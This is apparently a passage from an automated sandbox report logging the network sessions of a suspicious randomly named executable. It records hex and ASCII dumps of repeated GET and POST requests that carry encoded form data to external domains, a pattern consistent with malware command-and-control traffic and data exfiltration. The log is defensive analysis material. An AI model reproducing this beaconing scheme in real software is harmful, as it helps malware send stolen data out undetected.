                                                                                                                                            Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                                                                                                                            Oct 10, 2024 12:52:53.309438944 CEST448INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                                                                                                            Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                                                                                                                            Oct 10, 2024 12:52:53.309449911 CEST1236INData Raw: 74 68 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 66 61 62 6c 65 73 2d 74 6f 70 2d 68 65 61 64 65 72 2d 73 69 67 6e 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: th-background-color fables-top-header-signin"> <div class="container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn bt
                                                                                                                                            Oct 10, 2024 12:52:53.309458971 CEST1236INData Raw: 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61
                                                                                                                                            Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right"> <p class="fabl
                                                                                                                                            Oct 10, 2024 12:52:53.309475899 CEST448INData Raw: 6f 6e 20 74 65 78 74 2d 77 68 69 74 65 20 66 6f 6e 74 2d 31 36 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: on text-white font-16"></span> </button> <div class="collapse navbar-collapse" id="fablesNavDropdown"> <ul class="navbar-nav mx-auto fables-nav">
                                                                                                                                            Oct 10, 2024 12:52:53.309485912 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                                                                                                                            Oct 10, 2024 12:52:53.309497118 CEST1236INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                                                                                                                            Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                                                                                                                            Oct 10, 2024 12:52:53.309506893 CEST448INData Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                                                                                                                                            Oct 10, 2024 12:52:53.309771061 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                                                                                                                            Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                                                                                                                            Oct 10, 2024 12:52:53.314706087 CEST1236INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                                                                                                                            Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            20192.168.2.66141067.223.117.189805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:55.273695946 CEST504OUTGET /bcpd/?5vc=00X9d/BTKK5R5e14wWEt126s+mdVGBYlWg3KruQB0GNMBll6v3rooUlUxbesnPMHDrwLyGZxaHgZZw9MEvoNzTeh6b+sdgkolwxMs8g4smMKoeawjyQiJRB92JfMM9Rn76Nc6Cg=&lLYL=kvUX HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.gutpox.life
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:52:55.875581026 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:55 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            Content-Length: 32106
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:52:55.875597954 CEST224INData Raw: 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73
                                                                                                                                            Data Ascii: strap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="styles
                                                                                                                                            Oct 10, 2024 12:52:55.875608921 CEST1236INData Raw: 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4f 57 4c 20 43 41 52 4f 55 53 45 4c 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f 77 6c 2e 63 61
                                                                                                                                            Data Ascii: heet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="sty
                                                                                                                                            Oct 10, 2024 12:52:55.875619888 CEST1236INData Raw: 63 72 65 65 6e 20 2d 2d 3e 0a 3c 64 69 76 20 69 64 3d 22 6a 75 2d 6c 6f 61 64 69 6e 67 2d 73 63 72 65 65 6e 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63
                                                                                                                                            Data Ascii: creen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-b
                                                                                                                                            Oct 10, 2024 12:52:55.875631094 CEST1236INData Raw: 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 46 72 61 6e 63 65 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 46 72 65 6e 63 68 3c 2f 61 3e 20 0a 20 20
                                                                                                                                            Data Ascii: ="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a> </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <
                                                                                                                                            Oct 10, 2024 12:52:55.875643015 CEST672INData Raw: 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 66 61 62 6c 65 73 4e 61 76 44 72 6f 70
                                                                                                                                            Data Ascii: ="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon t
                                                                                                                                            Oct 10, 2024 12:52:55.875654936 CEST1236INData Raw: 68 61 73 70 6f 70 75 70 3d 22 74 72 75 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: haspopup="true" aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                                                                                                                            Oct 10, 2024 12:52:55.875667095 CEST1236INData Raw: 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: -item dropdown-toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                                                                                                                            Oct 10, 2024 12:52:55.875678062 CEST448INData Raw: 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: -item" href="header2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                                                                                                                                            Oct 10, 2024 12:52:55.875775099 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d
                                                                                                                                            Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                                                                                                                            Oct 10, 2024 12:52:55.880820990 CEST1236INData Raw: 61 64 65 72 20 34 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: ader 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            21192.168.2.6614113.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:01.011142969 CEST776OUTPOST /4q0i/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.rmgltd.services
                                                                                                                                            Origin: http://www.rmgltd.services
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.rmgltd.services/4q0i/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 42 76 4c 46 39 77 51 51 4c 41 49 37 33 50 51 47 5a 59 6b 65 4d 56 48 62 57 50 56 6a 68 52 77 68 4f 54 62 39 57 70 4b 62 73 2f 52 37 64 4c 4c 32 47 61 5a 72 36 48 53 44 66 67 45 37 7a 4a 35 63 54 38 64 79 57 6c 77 59 6d 57 42 39 51 73 33 42 37 49 48 6a 64 75 62 48 32 63 35 36 6d 4a 77 51 4d 77 56 43 62 63 32 34 70 2f 48 45 34 50 65 37 37 67 38 69 4e 76 41 6e 2b 67 66 74 2b 45 71 66 75 4b 79 6f 2b 67 48 79 48 66 2b 62 67 4e 63 72 5a 66 2f 34 71 72 6f 47 58 43 52 4b 44 44 56 50 74 66 66 32 78 6e 65 4a 31 57 73 71 38 6a 77 5a 57 48 6e 33 44 53 47 37 32 75 36 2b 61 78 58 4c 66 34 2b 5a 57 58 46 53 66 54 6d 47
                                                                                                                                            Data Ascii: 5vc=BvLF9wQQLAI73PQGZYkeMVHbWPVjhRwhOTb9WpKbs/R7dLL2GaZr6HSDfgE7zJ5cT8dyWlwYmWB9Qs3B7IHjdubH2c56mJwQMwVCbc24p/HE4Pe77g8iNvAn+gft+EqfuKyo+gHyHf+bgNcrZf/4qroGXCRKDDVPtff2xneJ1Wsq8jwZWHn3DSG72u6+axXLf4+ZWXFSfTmG


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            22192.168.2.6614123.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:03.562704086 CEST800OUTPOST /4q0i/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.rmgltd.services
                                                                                                                                            Origin: http://www.rmgltd.services
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.rmgltd.services/4q0i/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 42 76 4c 46 39 77 51 51 4c 41 49 37 33 76 67 47 62 37 63 65 4e 31 48 63 49 2f 56 6a 76 42 77 6c 4f 54 48 39 57 6f 65 4c 73 4e 31 37 65 71 37 32 46 66 74 72 33 6e 53 44 58 41 45 2b 73 5a 35 44 54 38 59 48 57 6b 4d 59 6d 57 46 39 51 73 48 42 36 37 76 67 63 2b 62 46 39 38 35 43 69 4a 77 51 4d 77 56 43 62 63 69 57 70 2b 6a 45 34 2f 75 37 71 30 49 68 54 66 41 67 39 67 66 74 76 55 71 62 75 4b 7a 4e 2b 68 61 56 48 63 57 62 67 4d 4d 72 5a 4e 58 37 6b 72 6f 41 54 43 52 55 4d 53 67 41 67 65 79 76 32 6b 36 45 30 33 73 43 30 31 78 44 4b 30 6e 55 52 43 6d 35 32 73 69 4d 61 52 58 68 64 34 47 5a 45 41 4a 31 51 6e 44 6c 68 31 34 62 7a 75 50 52 34 64 46 4f 6b 46 55 70 31 6b 32 64 6b 67 3d 3d
                                                                                                                                            Data Ascii: 5vc=BvLF9wQQLAI73vgGb7ceN1HcI/VjvBwlOTH9WoeLsN17eq72Fftr3nSDXAE+sZ5DT8YHWkMYmWF9QsHB67vgc+bF985CiJwQMwVCbciWp+jE4/u7q0IhTfAg9gftvUqbuKzN+haVHcWbgMMrZNX7kroATCRUMSgAgeyv2k6E03sC01xDK0nURCm52siMaRXhd4GZEAJ1QnDlh14bzuPR4dFOkFUp1k2dkg==


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            23192.168.2.6614133.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:06.101797104 CEST1813OUTPOST /4q0i/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.rmgltd.services
                                                                                                                                            Origin: http://www.rmgltd.services
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.rmgltd.services/4q0i/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 42 76 4c 46 39 77 51 51 4c 41 49 37 33 76 67 47 62 37 63 65 4e 31 48 63 49 2f 56 6a 76 42 77 6c 4f 54 48 39 57 6f 65 4c 73 4e 39 37 65 63 6e 32 48 34 78 72 32 6e 53 44 64 67 45 2f 73 5a 34 5a 54 36 77 44 57 6b 42 74 6d 51 5a 39 53 50 2f 42 7a 75 62 67 4a 75 62 46 79 63 35 35 6d 4a 78 4b 4d 77 6c 47 62 63 79 57 70 2b 6a 45 34 38 32 37 36 51 38 68 52 66 41 6e 2b 67 66 70 2b 45 71 7a 75 4b 72 37 2b 68 75 76 48 4e 32 62 35 73 38 72 59 34 6a 37 73 72 6f 43 55 43 51 48 4d 53 39 41 67 65 75 5a 32 6c 66 76 30 31 77 43 33 43 45 49 65 48 4b 4d 43 78 44 66 6f 38 53 59 54 6e 44 4d 55 4c 61 38 43 77 63 48 53 44 43 4c 6a 78 73 65 37 49 61 51 31 4f 35 42 6c 78 45 34 78 58 54 75 77 59 77 75 39 4d 6c 61 46 35 50 56 76 61 54 44 43 4e 63 37 6c 37 34 5a 79 34 6f 49 65 57 30 46 6e 6d 42 37 79 6a 34 57 67 55 41 44 33 45 54 36 39 68 43 30 62 6d 46 46 63 61 2b 4c 67 5a 44 4f 45 67 30 6e 43 53 79 37 65 6a 6c 51 72 2b 77 7a 44 73 33 51 58 53 67 5a 6a 49 5a 66 6c 6f 65 6f 54 41 36 61 41 63 35 42 38 66 4d 71 6d 4a [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=BvLF9wQQLAI73vgGb7ceN1HcI/VjvBwlOTH9WoeLsN97ecn2H4xr2nSDdgE/sZ4ZT6wDWkBtmQZ9SP/BzubgJubFyc55mJxKMwlGbcyWp+jE48276Q8hRfAn+gfp+EqzuKr7+huvHN2b5s8rY4j7sroCUCQHMS9AgeuZ2lfv01wC3CEIeHKMCxDfo8SYTnDMULa8CwcHSDCLjxse7IaQ1O5BlxE4xXTuwYwu9MlaF5PVvaTDCNc7l74Zy4oIeW0FnmB7yj4WgUAD3ET69hC0bmFFca+LgZDOEg0nCSy7ejlQr+wzDs3QXSgZjIZfloeoTA6aAc5B8fMqmJMw2IPV4tLdwvmJRa5zDp3AdOWGPogolZJQVRWnDPxnQGqR1WkJ/Ev2cZtzTOyA/xo1aDB5O4JRmZeGyPsRs7Wq5SFP5EOqTYAJnubvHu6Wpw3FSv0n+WMYfskQd0QTovKpWW/J7bouxvBhDvOy9xGEO7uXNx5GasPZlrCckTuflCqr8MWxVFrXIWw9+RUNub+FFXPGB/5tA7S/3zHIyH1BuG4qaXMOI7ywt+VCcaw0s4w3Js7PNeFxkfU7anT+sduJUKk0RVQsdrtIzokoMekB/kM+aI2hgk+JpEhqFpYPATOcslWONBBkhsWzm6pOe+nz6UJVKr/RTX/1ZtVrXicmz9NFeW6UhJNIK9ZGLhJUTWd69GRnIZS/18FkHF5TxhpxwX0lkepwtPMfigo41r+76+HB2sLx7LJMKItU1NVHY6ZK40IILSFbn74S2F8xRhNY8pfa2IAFzYWT2j0x9dT9pWVU++plpqpUEVqf3n0CIJGceVy9wrowPRsYgX9YLoz5/TDvxHTRYkWJRJztIPK6L3Fuh2BU7CVE0E6CRQX8mknD0RFzggJ2DqW9ZkLLU6VE4fs3Evrvo/C1W9q+tP0k4b76Wt8Jlpz25MEKIn6lkBq/J419cKkR1Lv4wGHOtaAuapN2xbG0tQDRQOABRIupxVR69A3he7JY [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            24192.168.2.6614143.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:08.648664951 CEST508OUTGET /4q0i/?5vc=Mtjl+FxSDFp18/BZR6oNC2DOD+4HgiEAKAntLL23ldF4UbjsNYBtxHiYQGIEs/p+ZIYPMWFkhQRucvjI1Y3PYOaDxPUXp4ZORiVeXJKAwrXw2/vN6xU2Cfcx0UqMhVjm/OzR1n4=&lLYL=kvUX HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.rmgltd.services
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:53:09.154681921 CEST405INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Thu, 10 Oct 2024 10:53:09 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 265
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 76 63 3d 4d 74 6a 6c 2b 46 78 53 44 46 70 31 38 2f 42 5a 52 36 6f 4e 43 32 44 4f 44 2b 34 48 67 69 45 41 4b 41 6e 74 4c 4c 32 33 6c 64 46 34 55 62 6a 73 4e 59 42 74 78 48 69 59 51 47 49 45 73 2f 70 2b 5a 49 59 50 4d 57 46 6b 68 51 52 75 63 76 6a 49 31 59 33 50 59 4f 61 44 78 50 55 58 70 34 5a 4f 52 69 56 65 58 4a 4b 41 77 72 58 77 32 2f 76 4e 36 78 55 32 43 66 63 78 30 55 71 4d 68 56 6a 6d 2f 4f 7a 52 31 6e 34 3d 26 6c 4c 59 4c 3d 6b 76 55 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5vc=Mtjl+FxSDFp18/BZR6oNC2DOD+4HgiEAKAntLL23ldF4UbjsNYBtxHiYQGIEs/p+ZIYPMWFkhQRucvjI1Y3PYOaDxPUXp4ZORiVeXJKAwrXw2/vN6xU2Cfcx0UqMhVjm/OzR1n4=&lLYL=kvUX"}</script></head></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            25192.168.2.661415217.70.184.50805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:14.268765926 CEST773OUTPOST /7u7b/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
